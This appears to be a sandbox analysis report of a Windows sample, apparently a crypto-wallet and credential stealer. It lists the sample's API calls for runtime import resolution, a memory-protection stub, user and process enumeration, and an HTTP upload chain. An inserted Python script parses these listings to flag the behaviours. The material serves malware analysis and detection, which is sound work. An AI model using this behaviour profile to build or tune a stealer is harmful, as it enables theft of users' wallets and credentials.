15834 5786bc CreateToolhelp32Snapshot Process32First 15833->15834 15835 57875d CloseHandle 15834->15835 15836 5786e8 Process32Next 15834->15836 15837 57a7a0 lstrcpy 15835->15837 15836->15835 15841 5786fd 15836->15841 15839 578776 15837->15839 15838 57a8a0 lstrcpy 15838->15841 15839->15290 15840 57a9b0 lstrcpy lstrlen lstrcpy lstrcat 15840->15841 15841->15836 15841->15838 15841->15840 15843 57a7a0 lstrcpy 15842->15843 15844 5751b5 15843->15844 15845 561590 lstrcpy 15844->15845 15846 5751c6 15845->15846 15861 565100 15846->15861 15848 5751cf 15848->15302 15852 577720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 
• [Control-flow graph edge list, extraction residue of a rendered graph. Call sites recoverable from the node labels: 577765 RegQueryValueExA and 577780 RegCloseKey; 5789f9 GetProcessHeap, HeapFree; 565119-565913 string assembly through the lstrcpy/lstrlen helpers (57a740, 57a7a0, 57a8a0, 57a920, 57a9b0), with 578ea0 calling CryptBinaryToStringA twice around GetProcessHeap/RtlAllocateHeap (consistent with a size query followed by the encode), then 5651fd InternetOpenA and StrCmpCA, 565329 InternetConnectA, 565359 HttpOpenRequestA and 5658b7/5658c4 InternetCloseHandle; 566d40 with 56668f/566743 VirtualAlloc, 566a09 LoadLibraryA, 566ba8 GetProcAddress, 578a10 GetProcessHeap/RtlAllocateHeap, 566f26 FreeLibrary and 566ee6 VirtualFree.]

Control-flow Graph
• Function 579860 (edge list only; the rendered graph and its executed/not-executed colouring are not recoverable): 579860-579874 calls 579750 and either runs 57987a-579a8e (calls 579780, 21 GetProcAddress) or skips to 579a93-579af2 (five LoadLibraryA); five further GetProcAddress blocks (579af4-579b08, 579b16-579b41, 579b4f-579b63, 579b71-579b84, 579b92-579bbc) are each entered conditionally from 579b0d, 579b46, 579b68 and 579b89; return at 579bc1-579bc2.
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00E424A0), ref: 005798A1
                            • GetProcAddress.KERNEL32(74DD0000,00E423F8), ref: 005798BA
                            • GetProcAddress.KERNEL32(74DD0000,00E42230), ref: 005798D2
                            • GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 005798EA
                            • GetProcAddress.KERNEL32(74DD0000,00E42410), ref: 00579903
                            • GetProcAddress.KERNEL32(74DD0000,00E49148), ref: 0057991B
                            • GetProcAddress.KERNEL32(74DD0000,00E357B0), ref: 00579933
                            • GetProcAddress.KERNEL32(74DD0000,00E35930), ref: 0057994C
                            • GetProcAddress.KERNEL32(74DD0000,00E424E8), ref: 00579964
                            • GetProcAddress.KERNEL32(74DD0000,00E422F0), ref: 0057997C
                            • GetProcAddress.KERNEL32(74DD0000,00E42350), ref: 00579995
                            • GetProcAddress.KERNEL32(74DD0000,00E424B8), ref: 005799AD
                            • GetProcAddress.KERNEL32(74DD0000,00E35810), ref: 005799C5
                            • GetProcAddress.KERNEL32(74DD0000,00E423C8), ref: 005799DE
                            • GetProcAddress.KERNEL32(74DD0000,00E423B0), ref: 005799F6
                            • GetProcAddress.KERNEL32(74DD0000,00E35870), ref: 00579A0E
                            • GetProcAddress.KERNEL32(74DD0000,00E42428), ref: 00579A27
                            • GetProcAddress.KERNEL32(74DD0000,00E42488), ref: 00579A3F
                            • GetProcAddress.KERNEL32(74DD0000,00E359D0), ref: 00579A57
                            • GetProcAddress.KERNEL32(74DD0000,00E422A8), ref: 00579A70
                            • GetProcAddress.KERNEL32(74DD0000,00E35A50), ref: 00579A88
                            • LoadLibraryA.KERNEL32(00E42380,?,00576A00), ref: 00579A9A
                            • LoadLibraryA.KERNEL32(00E42470,?,00576A00), ref: 00579AAB
                            • LoadLibraryA.KERNEL32(00E42338,?,00576A00), ref: 00579ABD
                            • LoadLibraryA.KERNEL32(00E42248,?,00576A00), ref: 00579ACF
                            • LoadLibraryA.KERNEL32(00E424D0,?,00576A00), ref: 00579AE0
                            • GetProcAddress.KERNEL32(75A70000,00E42278), ref: 00579B02
                            • GetProcAddress.KERNEL32(75290000,00E42500), ref: 00579B23
                            • GetProcAddress.KERNEL32(75290000,00E42368), ref: 00579B3B
                            • GetProcAddress.KERNEL32(75BD0000,00E42218), ref: 00579B5D
                            • GetProcAddress.KERNEL32(75450000,00E358B0), ref: 00579B7E
                            • GetProcAddress.KERNEL32(76E90000,00E491E8), ref: 00579B9F
                            • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00579BB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
• Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: #$($$0"$0Y$8#$H"$NtQueryInformationProcess$P#$PZ$h#$p$$pX$x"$#$$
                            • API String ID: 2238633743-3980375894
                            • Opcode ID: b64390886b91748c732b6dcd285481374ac43d1363934a9296a1ea46cc0dd26e
                            • Instruction ID: be21015b1f53a35d2aff094fdd8cffb4045de5611c0214bd9d02cb88e08cbea5
                            • Opcode Fuzzy Hash: b64390886b91748c732b6dcd285481374ac43d1363934a9296a1ea46cc0dd26e
                            • Instruction Fuzzy Hash: 90A16BB5500250FFD395EFA8ED88A663BF9F7DE301704C51AA60983264D73DA841CF2A

                            Control-flow Graph

                            • Executed
                            • Not Executed
• Function 5645c0 (edge list only; rendered graph not recoverable): 5645c0-564695 calls RtlAllocateHeap; 5646a0-5646a6 and 5646ac-56474a form a loop (5646ac-56474a branches back to 5646a0); on leaving the loop, 56474f-5647a9 calls VirtualProtect and returns.
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 0056460E
                            • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0056479C
                            Strings
• The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (the same string at all 30 sites): 005645C7, 005645D2, 005645DD, 005645E8, 005645F3, 00564617, 00564622, 0056462D, 00564638, 00564643, 00564657, 00564662, 0056466D, 00564678, 00564683, 005646AC, 005646B7, 005646C2, 005646CD, 005646D8, 00564713, 0056471E, 00564729, 00564734, 0056473F, 0056474F, 0056475A, 00564765, 00564770, 0056477B
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
• String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string repeated 30 times, once per xref above)
                            • API String ID: 1542196881-2218711628
                            • Opcode ID: 5bdb416adfaccafb515cdd379fdc3029ad31caeb4f925ed6811209701354cdbc
                            • Instruction ID: b868767ec7049430527c2c3ba3005e9834e9a5aa08bbe00619f850c738251224
                            • Opcode Fuzzy Hash: 5bdb416adfaccafb515cdd379fdc3029ad31caeb4f925ed6811209701354cdbc
                            • Instruction Fuzzy Hash: 154147616DA6046BEE24B7B5C842EAD7BD7FF4370AF507140EF0062296DBB065086722

                            Control-flow Graph

                            • Executed
                            • Not Executed
• Function 564880 (edge list only; rendered graph not recoverable): 564880-564942 calls 57a7a0, 5647b0 (lstrlen, InternetCrackUrlA) and 57a740 five times, then InternetOpenA and StrCmpCA; 564955-564acd assembles strings through 578b60 and the 57a920/57a8a0/57a800/57a9b0 helpers and calls InternetConnectA, the other branch leading to 564ecb-564ef3 (InternetCloseHandle, 57aad0, 569ac0); 564aef-564b22 calls HttpOpenRequestA, the other branch leading to 564ebe-564ec5 (InternetCloseHandle); 564b28-564e28 builds the request with the same helpers, 57aad0 and lstrlen, then HttpSendRequestA; 564e32-564e5c calls InternetReadFile, with 564e5e-564e65 deciding whether to append the chunk at 564e69-564ea7 (57a9b0, 57a8a0, 57a800) and read again or to fall through to 564e67-564eb9 (InternetCloseHandle, 57a800); all paths rejoin at 564ebe, then 564ecb, and finish through 564ef5-564f2d and/or 564f32-564fa2 (578990 twice, 57a7a0, 57a800 eight times).
                            APIs
                              • Part of subcall function 0057A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0057A7E6
                              • Part of subcall function 005647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00564839
                              • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
                              • Part of subcall function 0057A740: lstrcpy.KERNEL32(00580E17,00000000), ref: 0057A788
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00564915
                            • StrCmpCA.SHLWAPI(?,00E4EA18), ref: 0056493A
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00564ABA
                            • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00580DDB,00000000,?,?,00000000,?,",00000000,?,00E4EAA8), ref: 00564DE8
                            • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00564E04
                            • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00564E18
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00564E49
                            • InternetCloseHandle.WININET(00000000), ref: 00564EAD
                            • InternetCloseHandle.WININET(00000000), ref: 00564EC5
                            • HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00564B15
                              • Part of subcall function 0057A9B0: lstrlen.KERNEL32(?,00E48F88,?,\Monero\wallet.keys,00580E17), ref: 0057A9C5
                              • Part of subcall function 0057A9B0: lstrcpy.KERNEL32(00000000), ref: 0057AA04
                              • Part of subcall function 0057A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0057AA12
                              • Part of subcall function 0057A8A0: lstrcpy.KERNEL32(?,00580E17), ref: 0057A905
                              • Part of subcall function 0057A920: lstrcpy.KERNEL32(00000000,?), ref: 0057A972
                              • Part of subcall function 0057A920: lstrcat.KERNEL32(00000000), ref: 0057A982
                            • InternetCloseHandle.WININET(00000000), ref: 00564ECF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                            • String ID: "$"$------$------$------
                            • API String ID: 460715078-2180234286
                            • Opcode ID: 1df7491c619ca770580d0d6d09644aba92945e69544006cabc6ada730d8cf9f2
                            • Instruction ID: 2a60bf4b31664fd55cc2b181af74415aa771b644e4f2bfb0e0add6b9a89d4867
                            • Opcode Fuzzy Hash: 1df7491c619ca770580d0d6d09644aba92945e69544006cabc6ada730d8cf9f2
                            • Instruction Fuzzy Hash: EA12FF72910119AADB15EB60EC56FEEBB38BFD4300F508199B11A72091EF702F49DF66
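The three function records above (runtime import resolution through LoadLibraryA/GetProcAddress, the RtlAllocateHeap-then-VirtualProtect stub, and the WinINet request chain) are the kind of per-function API listing an analyst reads by eye. Added example, not part of the Joe Sandbox report or of the sample: a Python classifier that parses such "APIs" bullet lines into call records, orders them by call site and flags those three behaviours, decoding the InternetConnectA service type and the HttpOpenRequestA dwFlags value (00400100 above) against the wininet.h constants. The finding names, the GetProcAddress threshold and the call-site ordering are assumptions made here; the sample listings are copied from the blocks above (the resolver's listing abbreviated).

```python
"""Classify the per-function "APIs" listings of a Joe Sandbox report.
Added example, not part of the report: finding names, the GetProcAddress
threshold and call-site ordering are assumptions; flag tables are wininet.h."""
import re
from collections import namedtuple

# One bullet of the "APIs" section, e.g.
# "• HttpOpenRequestA.WININET(00000000,00E4E9F8,?,...), ref: 00564B15"
API_LINE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
WININET_FLAGS = {  # dwFlags bits of HttpOpenRequestA (subset of wininet.h)
    0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
    0x00800000: "INTERNET_FLAG_SECURE", 0x00400000: "INTERNET_FLAG_KEEP_CONNECTION",
    0x00200000: "INTERNET_FLAG_NO_AUTO_REDIRECT", 0x00080000: "INTERNET_FLAG_NO_COOKIES",
    0x00002000: "INTERNET_FLAG_IGNORE_CERT_DATE_INVALID",
    0x00001000: "INTERNET_FLAG_IGNORE_CERT_CN_INVALID",
    0x00000200: "INTERNET_FLAG_NO_UI", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE",
}
INTERNET_SERVICE = {1: "FTP", 3: "HTTP"}  # nService argument of InternetConnectA

# from_subcall: line was marked "Part of subcall function", i.e. made by a callee
Call = namedtuple("Call", "api module args ref from_subcall")

def parse_api_listing(text):
    """Parse bullet lines into Call records; any other line is skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
            calls.append(Call(m.group("api"), m.group("mod"), args,
                              int(m.group("ref"), 16), m.group("sub") is not None))
    return sorted(calls, key=lambda c: c.ref)  # call-site order, not listing order

def hexarg(arg):
    """Arguments are 8-hex-digit stack values, '?' (unknown) or literal strings."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None

def decode_wininet_flags(value):
    names = [n for bit, n in sorted(WININET_FLAGS.items(), reverse=True) if value & bit]
    leftover = value & ~sum(WININET_FLAGS)  # bits not in the table, kept as hex
    return names + ([f"0x{leftover:08x}"] if leftover else [])

def classify(calls, gpa_threshold=5):
    own = [c for c in calls if not c.from_subcall]
    order = [c.api for c in own]
    findings = {}
    # 1. Imports resolved at run time: many GetProcAddress calls whose name argument
    #    is a data/heap pointer (decrypted name), occasionally a literal string.
    gpa = [c for c in own if c.api == "GetProcAddress"]
    if len(gpa) >= gpa_threshold and "LoadLibraryA" in order:
        findings["runtime_import_resolution"] = {
            "GetProcAddress": len(gpa), "LoadLibraryA": order.count("LoadLibraryA"),
            "literal_names": [c.args[1] for c in gpa
                              if len(c.args) > 1 and hexarg(c.args[1]) is None]}
    # 2. Allocate first, change page protection later: self-modifying / unpacking stub.
    alloc = [c.ref for c in own if c.api in ("RtlAllocateHeap", "VirtualAlloc")]
    prot = [c.ref for c in own if c.api == "VirtualProtect"]
    if alloc and prot and min(alloc) < max(prot):
        findings["self_modifying_stub"] = {"VirtualProtect_ref": max(prot)}
    # 3. Complete WinINet request chain in call-site order, with arguments decoded.
    chain = ["InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
             "HttpSendRequestA", "InternetReadFile"]
    pos = [order.index(a) if a in order else -1 for a in chain]
    if min(pos) >= 0 and pos == sorted(pos):
        by_api = {c.api: c for c in own}
        conn, req, read = by_api["InternetConnectA"], by_api["HttpOpenRequestA"], by_api["InternetReadFile"]
        findings["http_client_chain"] = {
            "service": INTERNET_SERVICE.get(hexarg(conn.args[5]), "?") if len(conn.args) > 5 else "?",
            "flags": decode_wininet_flags(hexarg(req.args[6]) or 0) if len(req.args) > 6 else [],
            "read_chunk": hexarg(read.args[2]) if len(read.args) > 2 else None}
    return findings

# Sample listings copied from the three function blocks above (constructed input;
# the resolver's 28 GetProcAddress lines are abbreviated to five).
SAMPLE_RESOLVER = """
• GetProcAddress.KERNEL32(74DD0000,00E424A0), ref: 005798A1
• GetProcAddress.KERNEL32(74DD0000,00E423F8), ref: 005798BA
• GetProcAddress.KERNEL32(74DD0000,00E42230), ref: 005798D2
• GetProcAddress.KERNEL32(74DD0000,00E42320), ref: 005798EA
• LoadLibraryA.KERNEL32(00E42380,?,00576A00), ref: 00579A9A
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00579BB6
"""
SAMPLE_UNPACK = """
• RtlAllocateHeap.NTDLL(00000000), ref: 0056460E
• VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0056479C
"""
SAMPLE_HTTP = """
  • Part of subcall function 005647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00564849
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00564915
• InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00564ABA
• HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00564E18
• InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00564E49
• HttpOpenRequestA.WININET(00000000,00E4E9F8,?,00E4E188,00000000,00000000,00400100,00000000), ref: 00564B15
"""
```

Sorting by `ref` matters: the report lists HttpOpenRequestA after the InternetCloseHandle calls, but at call-site order it sits between InternetConnectA and HttpSendRequestA, which is what the chain check needs. For the listing above, `classify` reports the request as INTERNET_SERVICE_HTTP with INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_PRAGMA_NOCACHE and a 0x7CF-byte InternetReadFile chunk; calls marked "Part of subcall function" are parsed but excluded from the per-function verdict.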
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,005611B7), ref: 00577880
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00577887
                            • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0057789F
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateNameProcessUser
                            • String ID:
                            • API String ID: 1296208442-0
                            • Opcode ID: b8f54c7f31bd570804c6185961dfd101519d93368334311540c1f32e54e6c771
                            • Instruction ID: ac0be2ba71519fbe33314f70b60aa4caef234386eb5a2fd568a5a205709204cf
                            • Opcode Fuzzy Hash: b8f54c7f31bd570804c6185961dfd101519d93368334311540c1f32e54e6c771
                            • Instruction Fuzzy Hash: 41F044B1944209ABC700DF94DD45FAEBBB8FB45711F104559F605A2680C7781504CBA1
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.1776389225.0000000000561000.00000040.00000001.01000000.00000003.sdmp, Offset: 00560000, based on PE: true
                            • Associated: 00000000.00000002.1776376873.0000000000560000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000611000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.0000000000642000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776389225.00000000007AA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.00000000007BE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.000000000094E000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A2F000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A53000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776523266.0000000000A6A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776733611.0000000000A6B000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776905588.0000000000C0B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.1776918486.0000000000C0C000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_560000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExitInfoProcessSystem
                            • String ID:
                            • API String ID: 752954902-0
                            • Opcode ID: 78ab230d7e2f7238b4384d410f17b71447d4cc282f17c98571a2bc54a50e0c72
                            • Instruction ID: 2fd9e3cd0d82286d9cc6bb4ba6bd7f23c965eba37c4ba0aab4d0592ae4362e18
                            • Opcode Fuzzy Hash: 78ab230d7e2f7238b4384d410f17b71447d4cc282f17c98571a2bc54a50e0c72
                            • Instruction Fuzzy Hash: 0CD05E7490030CEBCB40DFE0D8496EEBB78FB49311F000554D90562340EB305881CBAA

                            Control-flow Graph

                            control_flow_graph 633 579c10-579c1a 634 57a036-57a0ca LoadLibraryA * 8 633->634 635 579c20-57a031 GetProcAddress * 43 633->635 636 57a146-57a14d 634->636 637 57a0cc-57a141 GetProcAddress * 5 634->637 635->634 638 57a216-57a21d 636->638 639 57a153-57a211 GetProcAddress * 8 636->639 637->636 640 57a21f-57a293 GetProcAddress * 5 638->640 641 57a298-57a29f 638->641 639->638 640->641 642 57a337-57a33e 641->642 643 57a2a5-57a332 GetProcAddress * 6 641->643 644 57a344-57a41a GetProcAddress * 9 642->644 645 57a41f-57a426 642->645 643->642 644->645 646 57a4a2-57a4a9 645->646 647 57a428-57a49d GetProcAddress * 5 645->647 648 57a4dc-57a4e3 646->648 649 57a4ab-57a4d7 GetProcAddress * 2 646->649 647->646 650 57a515-57a51c 648->650 651 57a4e5-57a510 GetProcAddress * 2 648->651 649->648 652 57a612-57a619 650->652 653 57a522-57a60d GetProcAddress * 10 650->653 651->650 654 57a67d-57a684 652->654 655 57a61b-57a678 GetProcAddress * 4 652->655 653->652 656 57a686-57a699 GetProcAddress 654->656 657 57a69e-57a6a5 654->657 655->654 656->657 658 57a6a7-57a703 GetProcAddress * 4 657->658 659 57a708-57a709 657->659 658->659
                            APIs
                            • GetProcAddress.KERNEL32(74DD0000,00E35830), ref: 00579C2D
                            • GetProcAddress.KERNEL32(74DD0000,00E35950), ref: 00579C45
                            • GetProcAddress.KERNEL32(74DD0000,00E496A0), ref: 00579C5E
                            • GetProcAddress.KERNEL32(74DD0000,00E496B8), ref: 00579C76
                            • GetProcAddress.KERNEL32(74DD0000,00E49640), ref: 00579C8E
                            • GetProcAddress.KERNEL32(74DD0000,00E496D0), ref: 00579CA7
                            • GetProcAddress.KERNEL32(74DD0000,00E3B748), ref: 00579CBF
                            • GetProcAddress.KERNEL32(74DD0000,00E4D2D8), ref: 00579CD7
                            • GetProcAddress.KERNEL32(74DD0000,00E4D110), ref: 00579CF0
                            • GetProcAddress.KERNEL32(74DD0000,00E4D128), ref: 00579D08
                            • GetProcAddress.KERNEL32(74DD0000,00E4D368), ref: 00579D20
                            • GetProcAddress.KERNEL32(74DD0000,00E35750), ref: 00579D39
                            • GetProcAddress.KERNEL32(74DD0000,00E358D0), ref: 00579D51
                            • GetProcAddress.KERNEL32(74DD0000,00E35990), ref: 00579D69
                            • GetProcAddress.KERNEL32(74DD0000,00E35710), ref: 00579D82
                            • GetProcAddress.KERNEL32(74DD0000,00E4D1E8), ref: 00579D9A
                            • GetProcAddress.KERNEL32(74DD0000,00E4D200), ref: 00579DB2
                            • GetProcAddress.KERNEL32(74DD0000,00E3B888), ref: 00579DCB
                            • GetProcAddress.KERNEL32(74DD0000,00E359B0), ref: 00579DE3
                            • GetProcAddress.KERNEL32(74DD0000,00E4D218), ref: 00579DFB
                            • GetProcAddress.KERNEL32(74DD0000,00E4D140), ref: 00579E14
                            • GetProcAddress.KERNEL32(74DD0000,00E4D2C0), ref: 00579E2C
                            • GetProcAddress.KERNEL32(74DD0000,00E4D1D0), ref: 00579E44
                            • GetProcAddress.KERNEL32(74DD0000,00E356F0), ref: 00579E5D
                            • GetProcAddress.KERNEL32(74DD0000,00E4D380), ref: 00579E75
                            • GetProcAddress.KERNEL32(74DD0000,00E4D2F0), ref: 00579E8D
                            • GetProcAddress.KERNEL32(74DD0000,00E4D1B8), ref: 00579EA6
                            • GetProcAddress.KERNEL32(74DD0000,00E4D3E0), ref: 00579EBE
                            • GetProcAddress.KERNEL32(74DD0000,00E4D230), ref: 00579ED6
                            • GetProcAddress.KERNEL32(74DD0000,00E4D398), ref: 00579EEF
                            • GetProcAddress.KERNEL32(74DD0000,00E4D308), ref: 00579F07
                            • GetProcAddress.KERNEL32(74DD0000,00E4D188), ref: 00579F1F
                            • GetProcAddress.KERNEL32(74DD0000,00E4D0F8), ref: 00579F38
                            • GetProcAddress.KERNEL32(74DD0000,00E4A960), ref: 00579F50
                            • GetProcAddress.KERNEL32(74DD0000,00E4D320), ref: 00579F68
                            • GetProcAddress.KERNEL32(74DD0000,00E4D248), ref: 00579F81
                            • GetProcAddress.KERNEL32(74DD0000,00E35A10), ref: 00579F99
                            • GetProcAddress.KERNEL32(74DD0000,00E4D338), ref: 00579FB1
                            • GetProcAddress.KERNEL32(74DD0000,00E358F0), ref: 00579FCA
                            • GetProcAddress.KERNEL32(74DD0000,00E4D260), ref: 00579FE2
                            • GetProcAddress.KERNEL32(74DD0000,00E4D3B0), ref: 00579FFA
                            • GetProcAddress.KERNEL32(74DD0000,00E35A30), ref: 0057A013
                            • GetProcAddress.KERNEL32(74DD0000,00E35E10), ref: 0057A02B
                            • LoadLibraryA.KERNEL32(00E4D3C8,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A03D
                            • LoadLibraryA.KERNEL32(00E4D158,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A04E
                            • LoadLibraryA.KERNEL32(00E4D278,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A060
                            • LoadLibraryA.KERNEL32(00E4D170,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A072
                            • LoadLibraryA.KERNEL32(00E4D350,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A083
                            • LoadLibraryA.KERNEL32(00E4D1A0,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A095
                            • LoadLibraryA.KERNEL32(00E4D290,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A0A7
                            • LoadLibraryA.KERNEL32(00E4D2A8,?,00575CA3,00580AEB,?,?,?,?,?,?,?,?,?,?,00580AEA,00580AE3), ref: 0057A0B8
                            • GetProcAddress.KERNEL32(75290000,00E35DF0), ref: 0057A0DA
                            • GetProcAddress.KERNEL32(75290000,00E4D578), ref: 0057A0F2
                            • GetProcAddress.KERNEL32(75290000,00E49218), ref: 0057A10A
                            • GetProcAddress.KERNEL32(75290000,00E4D440), ref: 0057A123
                            • GetProcAddress.KERNEL32(75290000,00E35BD0), ref: 0057A13B
                            • GetProcAddress.KERNEL32(734C0000,00E3B7C0), ref: 0057A160
